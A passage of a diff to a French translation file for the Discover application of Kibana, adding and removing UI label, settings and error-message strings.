"discover.fieldChooser.detailViews.valueOfRecordsText": "{value}/{totalValue} enregistrements", + "discover.fieldChooser.discoverField.addButtonAriaLabel": "Ajouter {field} au tableau", + "discover.fieldChooser.discoverField.removeButtonAriaLabel": "Supprimer {field} du 
tableau", + "discover.fieldChooser.fieldCalculator.fieldIsNotPresentInDocumentsErrorMessage": "Ce champ est présent dans votre mapping Elasticsearch, mais pas dans les {hitsLength} documents affichés dans le tableau des documents. Cependant, vous pouvez toujours le consulter ou effectuer une recherche dessus.", + "discover.fieldChooser.filter.fieldSelectorLabel": "Sélection des options du filtre {id}", + "discover.fieldNameDescription.dateRangeField": "Range of {dateFieldTypeLink} values. {viewSupportedDateFormatsLink}", + "discover.fieldNameDescription.versionField": "Versions des logiciels. Prend en charge les règles de priorité de {SemanticVersioningLink}.", + "discover.grid.copyClipboardButtonTitle": "Copier la valeur de {column}", + "discover.grid.copyColumnValuesToClipboard.toastTitle": "Valeurs de la colonne \"{column}\" copiées dans le presse-papiers", + "discover.grid.filterForAria": "Filtrer sur cette {value}", + "discover.grid.filterOutAria": "Exclure cette {value}", + "discover.gridSampleSize.description": "Vous voyez les {sampleSize} premiers échantillons de documents qui correspondent à votre recherche. Pour modifier cette valeur, accédez à {advancedSettingsLink}.", + "discover.histogramTimeRangeIntervalDescription": "(intervalle : {value})", + "discover.hitsPluralTitle": "{formattedHits} {hits, plural, one {résultat} other {résultats}}", + "discover.howToSeeOtherMatchingDocumentsDescription": "Voici les {sampleSize} premiers documents correspondant à votre recherche. 
Veuillez affiner celle-ci pour en voir plus.", + "discover.noMatchRoute.bannerText": "L'application Discover ne reconnaît pas cet itinéraire : {route}", + "discover.noResults.tryRemovingOrDisablingFilters": "Essayez de supprimer ou de {disablingFiltersLink}.", + "discover.pageTitleWithSavedSearch": "Discover - {savedSearchTitle}", + "discover.partialHits": "≥ {formattedHits} {hits, plural, one {résultat} other {résultats}}", + "discover.savedSearchAliasMatchRedirect.objectNoun": "Recherche {savedSearch}", + "discover.savedSearchURLConflictCallout.objectNoun": "Recherche {savedSearch}", + "discover.searchGenerationWithDescription": "Tableau généré par la recherche {searchTitle}", + "discover.searchGenerationWithDescriptionGrid": "Tableau généré par la recherche {searchTitle} ({searchDescription})", + "discover.selectedDocumentsNumber": "{nr} documents sélectionnés", + "discover.timeIntervalWithValue": "Intervalle de temps : {timeInterval}", + "discover.topNav.optionsPopover.currentViewMode": "{viewModeLabel} : {currentViewMode}", + "discover.utils.formatHit.moreFields": "et {count} {count, plural, one {autre champ} other {autres champs}}", + "discover.valueIsNotConfiguredDataViewIDWarningTitle": "{stateVal} n'est pas un ID de vue de données configuré", "discover.advancedSettings.context.defaultSizeText": "Le nombre d'entrées connexes à afficher dans la vue contextuelle", "discover.advancedSettings.context.defaultSizeTitle": "Taille de contexte", "discover.advancedSettings.context.sizeStepText": "L’incrément duquel augmenter ou diminuer la taille de contexte", 
@@ -2847,7 +1995,6 @@ "discover.advancedSettings.defaultColumnsText": "Les colonnes affichées par défaut dans l'application Discover. Si elles sont vides, un résumé du document s’affiche.", "discover.advancedSettings.defaultColumnsTitle": "Colonnes par défaut", "discover.advancedSettings.disableDocumentExplorer": "Explorateur de documents ou vue classique", - "discover.advancedSettings.disableDocumentExplorerDescription": "Désactivez cette option pour utiliser le nouveau {documentExplorerDocs} au lieu de la vue classique. l'explorateur de documents offre un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran.", "discover.advancedSettings.discover.fieldNameDescription.versionFieldLinkText": "Gestion sémantique des versions", "discover.advancedSettings.discover.fieldStatisticsLinkText": "Vue des statistiques de champ", "discover.advancedSettings.discover.modifyColumnsOnSwitchText": "Supprimez les colonnes qui ne sont pas disponibles dans la nouvelle vue de données.", 
@@ -2856,40 +2003,43 @@ "discover.advancedSettings.discover.readFieldsFromSource": "Lire les champs depuis _source", "discover.advancedSettings.discover.readFieldsFromSourceDescription": "Lorsque cette option est activée, les documents sont chargés directement depuis ''_source''. Elle sera bientôt déclassée. Lorsqu'elle est désactivée, les champs sont extraits via la nouvelle API de champ du service de recherche de haut niveau.", "discover.advancedSettings.discover.showFieldStatistics": "Afficher les statistiques de champ", - "discover.advancedSettings.discover.showFieldStatisticsDescription": "Activez le {fieldStatisticsDocs} pour afficher des détails tels que les valeurs minimale et maximale d'un champ numérique ou une carte d'un champ géographique. Cette fonctionnalité est en version bêta et susceptible d'être modifiée.", "discover.advancedSettings.discover.showMultifields": "Afficher les champs multiples", - "discover.advancedSettings.discover.showMultifieldsDescription": "Détermine si les {multiFields} doivent s'afficher dans la fenêtre de document étendue. Dans la plupart des cas, les champs multiples sont les mêmes que les champs d'origine. 
Cette option est uniquement disponible lorsque le paramètre ''searchFieldsFromSource'' est désactivé.", "discover.advancedSettings.docTableHideTimeColumnText": "Permet de masquer la colonne ''Time'' dans Discover et dans toutes les recherches enregistrées des tableaux de bord.", "discover.advancedSettings.docTableHideTimeColumnTitle": "Masquer la colonne ''Time''", "discover.advancedSettings.documentExplorerLinkText": "Explorateur de documents", - "discover.advancedSettings.fieldsPopularLimitText": "Les N champs les plus populaires à afficher", + "discover.advancedSettings.enableSQL.discussLinkText": "discuss.elastic.co/c/elastic-stack/kibana", + "discover.advancedSettings.enableSQLTitle": "Activer SQL", + "discover.advancedSettings.fieldsPopularLimitText": "Les N champs les plus populaires à afficher", "discover.advancedSettings.fieldsPopularLimitTitle": "Limite de champs populaires", "discover.advancedSettings.maxDocFieldsDisplayedText": "Le nombre maximal de champs renvoyés dans le résumé du document", "discover.advancedSettings.maxDocFieldsDisplayedTitle": "Nombre maximal de champs de document affichés", - "discover.advancedSettings.params.maxCellHeightText": "La hauteur maximale qu'une cellule de tableau peut atteindre. Définissez ce paramètre sur 0 pour désactiver la troncation.", + "discover.advancedSettings.params.maxCellHeightText": "La hauteur maximale qu'une cellule de tableau peut atteindre. Définissez ce paramètre sur 0 pour désactiver la troncation.", "discover.advancedSettings.params.maxCellHeightTitle": "Hauteur de cellule maximale dans le tableau classique", "discover.advancedSettings.params.rowHeightText": "Nombre de sous-lignes à autoriser dans une ligne. La valeur -1 ajuste automatiquement la hauteur de ligne selon le contenu. 
La valeur 0 affiche le contenu en une seule ligne.", "discover.advancedSettings.params.rowHeightTitle": "Hauteur de ligne dans l'explorateur de documents", + "discover.advancedSettings.sampleRowsPerPageText": "Limite le nombre de lignes par page dans le tableau de documents.", + "discover.advancedSettings.sampleRowsPerPageTitle": "Lignes par page", + "discover.advancedSettings.sampleSizeText": "Définit le nombre maximum de lignes pour l'ensemble du tableau de documents.", + "discover.advancedSettings.sampleSizeTitle": "Lignes max. par tableau", "discover.advancedSettings.searchOnPageLoadText": "Détermine si une recherche est exécutée lors du premier chargement de Discover. Ce paramètre n'a pas d'effet lors du chargement d’une recherche enregistrée.", "discover.advancedSettings.searchOnPageLoadTitle": "Recherche au chargement de la page", "discover.advancedSettings.sortDefaultOrderText": "Détermine le sens de tri par défaut pour les vues de données temporelles dans l'application Discover.", "discover.advancedSettings.sortDefaultOrderTitle": "Sens de tri par défaut", "discover.advancedSettings.sortOrderAsc": "Croissant", "discover.advancedSettings.sortOrderDesc": "Décroissant", + "discover.advancedSettings.technicalPreviewLabel": "version d'évaluation technique", "discover.alerts.createSearchThreshold": "Créer une règle de seuil de recherche", "discover.alerts.manageRulesAndConnectors": "Gérer les règles et les connecteurs", "discover.alerts.missedTimeFieldToolTip": "La vue de données ne possède pas de champ temporel.", "discover.backToTopLinkText": "Revenir en haut de la page.", "discover.badge.readOnly.text": "Lecture seule", "discover.badge.readOnly.tooltip": "Impossible d’enregistrer les recherches", - "discover.bucketIntervalTooltip": "Cet intervalle crée {bucketsDescription} pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été redimensionné vers {bucketIntervalDescription}.", "discover.bucketIntervalTooltip.tooLargeBucketsText": "des 
compartiments trop volumineux", "discover.bucketIntervalTooltip.tooManyBucketsText": "un trop grand nombre de compartiments", "discover.chartOptions": "Options de graphique", "discover.chartOptionsButton": "Options de graphique", "discover.clearSelection": "Effacer la sélection", "discover.context.breadcrumb": "Documents relatifs", - "discover.context.contextOfTitle": "Les documents relatifs à #{anchorId}", "discover.context.failedToLoadAnchorDocumentDescription": "Échec de chargement du document ancré", "discover.context.failedToLoadAnchorDocumentErrorDescription": "Le document ancré n’a pas pu être chargé.", "discover.context.invalidTieBreakerFiledSetting": "Paramètre de champ de départage non valide", 
@@ -2897,32 +2047,27 @@
 "discover.context.loadingDescription": "Chargement...",
 "discover.context.newerDocumentsAriaLabel": "Nombre de documents plus récents",
 "discover.context.newerDocumentsDescription": "documents plus récents",
- "discover.context.newerDocumentsWarning": "Seuls {docCount} documents plus récents que le document ancré ont été trouvés.",
 "discover.context.newerDocumentsWarningZero": "Aucun document plus récent que le document ancré n'a été trouvé.",
 "discover.context.olderDocumentsAriaLabel": "Nombre de documents plus anciens",
 "discover.context.olderDocumentsDescription": "documents plus anciens",
- "discover.context.olderDocumentsWarning": "Seuls {docCount} documents plus anciens que le document ancré ont été trouvés.",
 "discover.context.olderDocumentsWarningZero": "Aucun document plus ancien que le document ancré n'a été trouvé.",
 "discover.context.reloadPageDescription.reloadOrVisitTextMessage": "Veuillez recharger le document ou revenir à la liste pour sélectionner un document ancré valide.",
 "discover.context.unableToLoadAnchorDocumentDescription": "Impossible de charger le document ancré",
 "discover.context.unableToLoadDocumentDescription": "Impossible de charger les documents",
+ "discover.contextViewRoute.errorTitle": "Une erreur s'est produite",
 "discover.controlColumnHeader": "Colonne de commande",
 "discover.copyToClipboardJSON": "Copier les documents dans le presse-papiers (JSON)",
 "discover.discoverBreadcrumbTitle": "Discover",
 "discover.discoverDefaultSearchSessionName": "Discover",
 "discover.discoverDescription": "Explorez vos données de manière interactive en interrogeant et en filtrant des documents bruts.",
- "discover.discoverError.missingQueryParamsError": "La chaîne de requête URL est manquante {missingParamsList}.",
 "discover.discoverError.title": "Chargement de cette page impossible",
 "discover.discoverSubtitle": "Recherchez et obtenez des informations.",
 "discover.discoverTitle": "Discover",
"discover.doc.couldNotFindDocumentsDescription": "Aucun document ne correspond à cet ID.",
 "discover.doc.failedToExecuteQueryDescription": "Impossible d'exécuter la recherche",
- "discover.doc.failedToLocateDataView": "Aucune vue de données ne correspond à l'ID {dataViewId}.",
 "discover.doc.failedToLocateDocumentDescription": "Document introuvable",
 "discover.doc.loadingDescription": "Chargement…",
- "discover.doc.somethingWentWrongDescription": "Index {indexName} manquant.",
 "discover.doc.somethingWentWrongDescriptionAddon": "Veuillez vérifier que cet index existe.",
- "discover.docExplorerCallout.bodyMessage": "Triez, sélectionnez et comparez rapidement les données, redimensionnez les colonnes et affichez les documents en plein écran grâce à l'{documentExplorer}.",
 "discover.docExplorerCallout.closeButtonAriaLabel": "Fermer",
 "discover.docExplorerCallout.documentExplorer": "Explorateur de documents",
 "discover.docExplorerCallout.headerMessage": "Une meilleure façon d'explorer",
@@ -2934,20 +2079,12 @@
 "discover.docExplorerUpdateCallout.takeTourButtonLabel": "Découvrir",
 "discover.docExplorerUpdateCallout.title": "Optimiser l'affichage de vos résultats de recherche",
 "discover.docTable.documentsNavigation": "Navigation dans les documents",
- "discover.docTable.limitedSearchResultLabel": "Limité à {resultCount} résultats. Veuillez affiner votre recherche.",
- "discover.docTable.noResultsTitle": "Aucun résultat trouvé.",
+ "discover.docTable.noResultsTitle": "Résultat introuvable",
 "discover.docTable.rows": "lignes",
- "discover.docTable.rowsPerPage": "Lignes par page : {pageSize}",
 "discover.docTable.tableHeader.documentHeader": "Document",
- "discover.docTable.tableHeader.moveColumnLeftButtonAriaLabel": "Déplacer la colonne {columnName} vers la gauche",
 "discover.docTable.tableHeader.moveColumnLeftButtonTooltip": "Déplacer la colonne vers la gauche",
- "discover.docTable.tableHeader.moveColumnRightButtonAriaLabel": "Déplacer la colonne {columnName} vers la droite",
 "discover.docTable.tableHeader.moveColumnRightButtonTooltip": "Déplacer la colonne vers la droite",
- "discover.docTable.tableHeader.removeColumnButtonAriaLabel": "Supprimer la colonne {columnName}",
 "discover.docTable.tableHeader.removeColumnButtonTooltip": "Supprimer la colonne",
- "discover.docTable.tableHeader.sortByColumnAscendingAriaLabel": "Trier la colonne {columnName} par ordre croissant",
- "discover.docTable.tableHeader.sortByColumnDescendingAriaLabel": "Trier la colonne {columnName} par ordre décroissant",
- "discover.docTable.tableHeader.sortByColumnUnsortedAriaLabel": "Arrêter de trier la colonne {columnName}",
 "discover.docTable.tableHeader.timeFieldIconTooltip": "Ce champ représente l'heure à laquelle les événements se sont produits.",
 "discover.docTable.tableRow.detailHeading": "Document développé",
 "discover.docTable.tableRow.filterForValueButtonAriaLabel": "Filtrer sur la valeur",
@@ -2957,7 +2094,6 @@
 "discover.docTable.tableRow.toggleRowDetailsButtonAriaLabel": "Afficher/Masquer les détails de la ligne",
 "discover.docTable.tableRow.viewSingleDocumentLinkText": "Afficher un seul document",
 "discover.docTable.tableRow.viewSurroundingDocumentsLinkText": "Afficher les documents alentour",
- "discover.docTable.totalDocuments": "{totalDocuments} documents",
 "discover.documentsAriaLabel": "Documents",
 "discover.docView.table.actions.label": "Actions",
 "discover.docView.table.actions.open": "Actions ouvertes",
@@ -2989,13 +2125,11 @@
 "discover.docViews.table.unindexedFieldsCanNotBeSearchedTooltip": "Les champs non indexés ou les valeurs ignorées ne peuvent pas être recherchés",
 "discover.docViews.table.unpinFieldAriaLabel": "Désépingler le champ",
 "discover.docViews.table.unpinFieldLabel": "Désépingler le champ",
- "discover.dscTour.stepAddFields.description": "Cliquez sur {plusIcon} pour ajouter les champs qui vous intéressent.",
 "discover.dscTour.stepAddFields.imageAltText": "Dans la liste Champs disponibles, cliquez sur l'icône Plus pour afficher/masquer un champ dans le tableau de documents.",
 "discover.dscTour.stepAddFields.title": "Ajouter des champs dans le tableau",
 "discover.dscTour.stepChangeRowHeight.description": "Ajustez le nombre de lignes pour adapter la taille au contenu.",
 "discover.dscTour.stepChangeRowHeight.imageAltText": "Cliquez sur l'icône d'options d'affichage pour ajuster la hauteur de ligne afin d'adapter la taille au contenu.",
 "discover.dscTour.stepChangeRowHeight.title": "Modifier la hauteur de ligne",
- "discover.dscTour.stepExpand.description": "Cliquez sur l'{expandIcon} pour afficher, comparer et filtrer les documents.",
 "discover.dscTour.stepExpand.expandIconAriaLabel": "icône de développement",
 "discover.dscTour.stepExpand.imageAltText": "Cliquez sur l'icône de développement pour inspecter et filtrer les champs du document et afficher le document en contexte.",
 "discover.dscTour.stepExpand.title": "Développer les documents",
@@ -3012,34 +2146,25 @@
 "discover.errorLoadingChart": "Erreur lors du chargement du graphique",
 "discover.field.mappingConflict": "Ce champ est défini avec plusieurs types (chaîne, entier, etc.) dans les différents index qui correspondent à ce modèle. Vous pouvez toujours utiliser ce champ conflictuel, mais il sera indisponible pour les fonctions qui nécessitent que Kibana en connaisse le type. Pour corriger ce problème, vous devrez réindexer vos données.",
 "discover.field.mappingConflict.title": "Conflit de mapping",
- "discover.field.title": "{fieldName} ({fieldDisplayName})",
 "discover.fieldChooser.addField.label": "Ajouter un champ",
 "discover.fieldChooser.detailViews.emptyStringText": "Chaîne vide",
- "discover.fieldChooser.detailViews.existsInRecordsText": "Existe dans {value} / {totalValue} enregistrements",
- "discover.fieldChooser.detailViews.filterOutValueButtonAriaLabel": "Exclure le {field} : \"{value}\"",
- "discover.fieldChooser.detailViews.filterValueButtonAriaLabel": "Filtrer sur le {field} : \"{value}\"",
- "discover.fieldChooser.detailViews.valueOfRecordsText": "{value}/{totalValue} enregistrements",
 "discover.fieldChooser.discoverField.actions": "Actions",
- "discover.fieldChooser.discoverField.addButtonAriaLabel": "Ajouter {field} au tableau",
 "discover.fieldChooser.discoverField.addFieldTooltip": "Ajouter le champ en tant que colonne",
 "discover.fieldChooser.discoverField.deleteFieldLabel": "Supprimer le champ de la vue de données",
 "discover.fieldChooser.discoverField.editFieldLabel": "Modifier le champ de la vue de données",
- "discover.fieldChooser.discoverField.fieldTopValuesLabel": "Top 5 des valeurs",
+ "discover.fieldChooser.discoverField.fieldTopValuesLabel": "Top 5 des valeurs",
 "discover.fieldChooser.discoverField.multiField": "champ multiple",
 "discover.fieldChooser.discoverField.multiFields": "Champs multiples",
 "discover.fieldChooser.discoverField.multiFieldTooltipContent": "Les champs multiples peuvent avoir plusieurs valeurs.",
"discover.fieldChooser.discoverField.name": "Champ",
- "discover.fieldChooser.discoverField.removeButtonAriaLabel": "Supprimer {field} du tableau",
 "discover.fieldChooser.discoverField.removeFieldTooltip": "Supprimer le champ du tableau",
 "discover.fieldChooser.discoverField.value": "Valeur",
 "discover.fieldChooser.fieldCalculator.analysisIsNotAvailableForGeoFieldsErrorMessage": "L'analyse n'est pas disponible pour les champs géométriques.",
 "discover.fieldChooser.fieldCalculator.analysisIsNotAvailableForObjectFieldsErrorMessage": "L'analyse n'est pas disponible pour les champs d'objet.",
- "discover.fieldChooser.fieldCalculator.fieldIsNotPresentInDocumentsErrorMessage": "Ce champ est présent dans votre mapping Elasticsearch, mais pas dans les {hitsLength} documents affichés dans le tableau des documents. Cependant, vous pouvez toujours le consulter ou effectuer une recherche dessus.",
 "discover.fieldChooser.fieldFilterButtonLabel": "Filtrer par type",
 "discover.fieldChooser.fieldsMobileButtonLabel": "Champs",
 "discover.fieldChooser.filter.aggregatableLabel": "Regroupable",
 "discover.fieldChooser.filter.availableFieldsTitle": "Champs disponibles",
- "discover.fieldChooser.filter.fieldSelectorLabel": "Sélection des options du filtre {id}",
 "discover.fieldChooser.filter.filterByTypeLabel": "Filtrer par type",
 "discover.fieldChooser.filter.hideEmptyFieldsLabel": "Masquer les champs vides",
 "discover.fieldChooser.filter.indexAndFieldsSectionAriaLabel": "Index et champs",
@@ -3058,12 +2183,12 @@
 "discover.fieldList.flyoutBackIcon": "Retour",
 "discover.fieldList.flyoutHeading": "Liste des champs",
 "discover.fieldNameDescription.booleanField": "Valeurs vraies ou fausses.",
- "discover.fieldNameDescription.conflictField": "Le champ possède des valeurs de différents types. Corrigez le problème dans Gestion > Vues de données.",
+ "discover.fieldNameDescription.conflictField": "Le champ possède des valeurs de différents types. Corrigez le problème dans Gestion > Vues de données.",
 "discover.fieldNameDescription.dateField": "Chaîne de date ou nombre de secondes ou de millisecondes depuis 1/1/1970.",
- "discover.fieldNameDescription.dateRangeField": "Range of {dateFieldTypeLink} values. {viewSupportedDateFormatsLink}",
 "discover.fieldNameDescription.dateRangeFieldLinkText": "date",
 "discover.fieldNameDescription.geoPointField": "Points de latitude et de longitude.",
 "discover.fieldNameDescription.geoShapeField": "Formes complexes, telles que des polygones.",
+ "discover.fieldNameDescription.histogramField": "Valeurs numériques pré-agrégées sous forme d'histogramme.",
 "discover.fieldNameDescription.ipAddressField": "Adresses IPv4 et IPv6.",
 "discover.fieldNameDescription.ipAddressRangeField": "Plage de valeurs IP prenant en charge les adresses IPv4 ou IPv6 (ou les 2).",
 "discover.fieldNameDescription.keywordField": "Contenu structuré tel qu'un ID, une adresse e-mail, un nom d'hôte, un code de statut, ou une balise.",
@@ -3073,14 +2198,16 @@
 "discover.fieldNameDescription.stringField": "Texte intégral tel que le corps d'un e-mail ou la description d'un produit.",
 "discover.fieldNameDescription.textField": "Texte intégral tel que le corps d'un e-mail ou la description d'un produit.",
 "discover.fieldNameDescription.unknownField": "Champ inconnu",
- "discover.fieldNameDescription.versionField": "Versions des logiciels. Prend en charge les règles de priorité de {SemanticVersioningLink}.",
 "discover.fieldNameDescription.viewSupportedDateFormatsLinkText": "Affichez les formats de date pris en charge.",
 "discover.fieldNameIcons.booleanAriaLabel": "Champ booléen",
 "discover.fieldNameIcons.conflictFieldAriaLabel": "Champ conflictuel",
 "discover.fieldNameIcons.dateFieldAriaLabel": "Champ de date",
+ "discover.fieldNameIcons.dateRangeFieldAriaLabel": "Champ de plage de dates",
 "discover.fieldNameIcons.geoPointFieldAriaLabel": "Champ de point géographique",
 "discover.fieldNameIcons.geoShapeFieldAriaLabel": "Champ de forme géométrique",
- "discover.fieldNameIcons.ipAddressFieldAriaLabel": "Champ d'adresse IP",
+ "discover.fieldNameIcons.histogramFieldAriaLabel": "Champ d'histogramme",
+ "discover.fieldNameIcons.ipAddressFieldAriaLabel": "Champ d'adresse IP",
+ "discover.fieldNameIcons.ipRangeFieldAriaLabel": "Champ de plage d’IP",
 "discover.fieldNameIcons.keywordFieldAriaLabel": "Champ de mot-clé",
 "discover.fieldNameIcons.murmur3FieldAriaLabel": "Champ Murmur3",
 "discover.fieldNameIcons.nestedFieldAriaLabel": "Champ imbriqué",
@@ -3091,6 +2218,8 @@
 "discover.fieldNameIcons.unknownFieldAriaLabel": "Champ inconnu",
 "discover.fieldNameIcons.versionFieldAriaLabel": "Champ de version",
 "discover.fieldTypesPopover.buttonAriaLabel": "Aide sur le type de filtre",
+ "discover.fieldTypesPopover.dataTypeColumnTitle": "Type de données",
+ "discover.fieldTypesPopover.descriptionColumnTitle": "Description",
 "discover.fieldTypesPopover.fieldTypesDocLinkLabel": "types de champ",
 "discover.fieldTypesPopover.iconTitle": "Aide sur le type de filtre",
 "discover.fieldTypesPopover.learnMoreText": "Découvrez",
@@ -3098,12 +2227,16 @@
 "discover.goToDiscoverMainViewButtonText": "Accédez à la vue principale de Discover",
 "discover.grid.closePopover": "Fermer la fenêtre contextuelle",
 "discover.grid.copyClipboardButton": "Copier dans le presse-papiers",
- "discover.grid.copyClipboardButtonTitle": "Copier la valeur de {column}",
+ "discover.grid.copyColumnNameToClipboard.toastTitle": "Copié dans le presse-papiers",
+ "discover.grid.copyColumnNameToClipBoardButton": "Copier le nom",
+ "discover.grid.copyColumnValuesToClipBoardButton": "Copier la colonne",
+ "discover.grid.copyEscapedValueWithFormulasToClipboardWarningText": "Les valeurs peuvent contenir des formules avec échappement.",
+ "discover.grid.copyFailedErrorText": "Impossible de copier dans le presse-papiers avec ce navigateur",
+ "discover.grid.copyValueToClipboard.toastTitle": "Copié dans le presse-papiers",
 "discover.grid.documentHeader": "Document",
+ "discover.grid.editFieldButton": "Modifier le champ de la vue de données",
 "discover.grid.filterFor": "Filtrer sur",
- "discover.grid.filterForAria": "Filtrer sur cette {value}",
 "discover.grid.filterOut": "Exclure",
- "discover.grid.filterOutAria": "Exclure cette {value}",
 "discover.grid.flyout.documentNavigation": "Navigation dans le document",
 "discover.grid.flyout.toastColumnAdded": "La colonne \"{columnName}\" a été ajoutée.",
 "discover.grid.flyout.toastColumnRemoved": "La colonne \"{columnName}\" a été supprimée.",
@@ -3113,23 +2246,21 @@
 "discover.grid.tableRow.viewSingleDocumentLinkTextSimple": "Document unique",
 "discover.grid.tableRow.viewSurroundingDocumentsHover": "Inspectez des documents qui ont été créés avant et après ce document. Seuls les filtres épinglés restent actifs dans la vue Documents relatifs.",
 "discover.grid.tableRow.viewSurroundingDocumentsLinkTextSimple": "Documents relatifs",
- "discover.grid.tableRow.viewText": "Afficher :",
+ "discover.grid.tableRow.viewText": "Afficher :",
 "discover.grid.viewDoc": "Afficher/Masquer les détails de la boîte de dialogue",
- "discover.helpMenu.appName": "Discover",
+ "discover.gridSampleSize.advancedSettingsLinkLabel": "Paramètres avancés",
+ "discover.helpMenu.appName": "Découverte",
 "discover.hideChart": "Masquer le graphique",
 "discover.histogramOfFoundDocumentsAriaLabel": "Histogramme des documents détectés",
 "discover.histogramTimeRangeIntervalAuto": "Auto",
- "discover.histogramTimeRangeIntervalDescription": "(intervalle : {value})",
 "discover.hitCountSpinnerAriaLabel": "Nombre final de résultats toujours en chargement",
- "discover.hitsPluralTitle": "{formattedHits} {hits, plural, one {résultat} other {résultats}}",
- "discover.howToSeeOtherMatchingDocumentsDescription": "Voici les {sampleSize} premiers documents correspondant à votre recherche. 
Veuillez affiner celle-ci pour en voir plus.",
 "discover.inspectorRequestDataTitleChart": "Données du graphique",
 "discover.inspectorRequestDataTitleDocuments": "Documents",
 "discover.inspectorRequestDataTitleTotalHits": "Nombre total de résultats",
 "discover.inspectorRequestDescriptionChart": "Cette requête interroge Elasticsearch afin de récupérer les données d'agrégation pour le graphique.",
 "discover.inspectorRequestDescriptionDocument": "Cette requête interroge Elasticsearch afin de récupérer les documents.",
 "discover.inspectorRequestDescriptionTotalHits": "Cette requête interroge Elasticsearch afin de récupérer le nombre total de résultats.",
- "discover.json.codeEditorAriaLabel": "Affichage JSON en lecture seule d’un document Elasticsearch",
+ "discover.json.codeEditorAriaLabel": "Affichage JSON en lecture seule d’un document Elasticsearch",
 "discover.json.copyToClipboardLabel": "Copier dans le presse-papiers",
 "discover.loadingChartResults": "Chargement du graphique",
 "discover.loadingDocuments": "Chargement des documents",
@@ -3151,7 +2282,6 @@
 "discover.localMenu.saveTitle": "Enregistrer",
 "discover.localMenu.shareSearchDescription": "Partager la recherche",
 "discover.localMenu.shareTitle": "Partager",
- "discover.noMatchRoute.bannerText": "L'application Discover ne reconnaît pas cet itinéraire : {route}",
 "discover.noMatchRoute.bannerTitleText": "Page introuvable",
 "discover.noResults.adjustFilters": "Modifiez les filtres.",
 "discover.noResults.adjustSearch": "Modifiez la requête.",
@@ -3161,10 +2291,9 @@
 "discover.noResults.searchExamples.noResultsBecauseOfError": "Une erreur s’est produite lors de la récupération des résultats de recherche.",
 "discover.noResults.searchExamples.noResultsMatchSearchCriteriaTitle": "Aucun résultat ne correspond à vos critères de recherche.",
 "discover.noResults.temporaryDisablingFiltersLinkText": "désactiver temporairement les filtres",
- "discover.noResults.tryRemovingOrDisablingFilters": "Essayez de supprimer ou de {disablingFiltersLink}.",
 "discover.noResults.trySearchingForDifferentCombination": "Essayez de rechercher une autre combinaison de termes.",
 "discover.noResultsFound": "Résultat introuvable",
- "discover.notifications.invalidTimeRangeText": "La plage temporelle spécifiée n'est pas valide (de : \"{from}\" à \"{to}\").",
+ "discover.notifications.invalidTimeRangeText": "La plage temporelle spécifiée n'est pas valide (de : \"{from}\" à \"{to}\").",
 "discover.notifications.invalidTimeRangeTitle": "Plage temporelle non valide",
 "discover.notifications.notSavedSearchTitle": "La recherche \"{savedSearchTitle}\" n'a pas été enregistrée.",
 "discover.notifications.savedSearchTitle": "La recherche \"{savedSearchTitle}\" a été enregistrée.",
@@ -3173,52 +2302,40 @@
 "discover.openOptionsPopover.gotToSettings": "Afficher les paramètres de Discover",
 "discover.openOptionsPopover.tryDocumentExplorer": "Testez l'explorateur de documents",
 "discover.pageTitleWithoutSavedSearch": "Discover - Recherche non encore enregistrée",
- "discover.pageTitleWithSavedSearch": "Discover - {savedSearchTitle}",
- "discover.partialHits": "≥ {formattedHits} {hits, plural, one {résultat} other {résultats}}",
 "discover.reloadSavedSearchButton": "Réinitialiser la recherche",
 "discover.removeColumnLabel": "Supprimer la colonne",
 "discover.rootBreadcrumb": "Découverte",
 "discover.sampleData.viewLinkLabel": "Découverte",
 "discover.savedSearch.savedObjectName": "Recherche enregistrée",
- "discover.savedSearchAliasMatchRedirect.objectNoun": "Recherche {savedSearch}",
 "discover.savedSearchEmbeddable.action.viewSavedSearch.displayName": "Ouvrir dans Discover",
- "discover.savedSearchURLConflictCallout.objectNoun": "Recherche {savedSearch}",
- "discover.searchGenerationWithDescription": "Tableau généré par la recherche {searchTitle}",
- "discover.searchGenerationWithDescriptionGrid": "Tableau généré par la recherche {searchTitle} ({searchDescription})",
 "discover.searchingTitle": "Recherche",
 "discover.selectColumnHeader": "Sélectionner la colonne",
- "discover.selectedDocumentsNumber": "{nr} documents sélectionnés",
 "discover.showAllDocuments": "Afficher tous les documents",
 "discover.showChart": "Afficher le graphique",
 "discover.showErrorMessageAgain": "Afficher le message d'erreur",
- "discover.showingDefaultDataViewWarningDescription": "Affichage de la vue de données par défaut : \"{loadedDataViewTitle}\" ({loadedDataViewId})",
- "discover.showingSavedDataViewWarningDescription": "Affichage de la vue de données enregistrée : \"{ownDataViewTitle}\" ({ownDataViewId})",
 "discover.showSelectedDocumentsOnly": "Afficher uniquement les documents sélectionnés",
- "discover.singleDocRoute.errorMessage": "Pas de modèle d'indexation 
correspondant pour l'ID {dataViewId}",
 "discover.singleDocRoute.errorTitle": "Une erreur s'est produite",
 "discover.skipToBottomButtonLabel": "Atteindre la fin du tableau",
 "discover.sourceViewer.errorMessage": "Impossible de récupérer les données pour le moment. Actualisez l'onglet et réessayez.",
 "discover.sourceViewer.errorMessageTitle": "Une erreur s'est produite.",
 "discover.sourceViewer.refresh": "Actualiser",
 "discover.timeIntervals": "Intervalles de temps",
- "discover.timeIntervalWithValue": "Intervalle de temps : {timeInterval}",
 "discover.timeIntervalWithValueWarning": "Avertissement",
 "discover.toggleSidebarAriaLabel": "Activer/Désactiver la barre latérale",
- "discover.topNav.openOptionsPopover.documentExplorerDisabledHint": "Saviez-vous que Discover possède un nouvel Explorateur de documents avec un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran ? Vous pouvez modifier le mode d'affichage dans les Paramètres avancés.",
+ "discover.topNav.openOptionsPopover.documentExplorerDisabledHint": "Saviez-vous que Discover possède un nouvel Explorateur de documents avec un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran ? 
Vous pouvez modifier le mode d'affichage dans les Paramètres avancés.",
 "discover.topNav.openOptionsPopover.documentExplorerEnabledHint": "Vous pouvez revenir à l'affichage Discover classique dans les Paramètres avancés.",
 "discover.topNav.openSearchPanel.manageSearchesButtonLabel": "Gérer les recherches",
 "discover.topNav.openSearchPanel.noSearchesFoundDescription": "Aucune recherche correspondante trouvée.",
 "discover.topNav.openSearchPanel.openSearchTitle": "Ouvrir une recherche",
- "discover.topNav.optionsPopover.currentViewMode": "{viewModeLabel} : {currentViewMode}",
 "discover.topNav.optionsPopover.discoverViewModeLabel": "Mode d'affichage Discover",
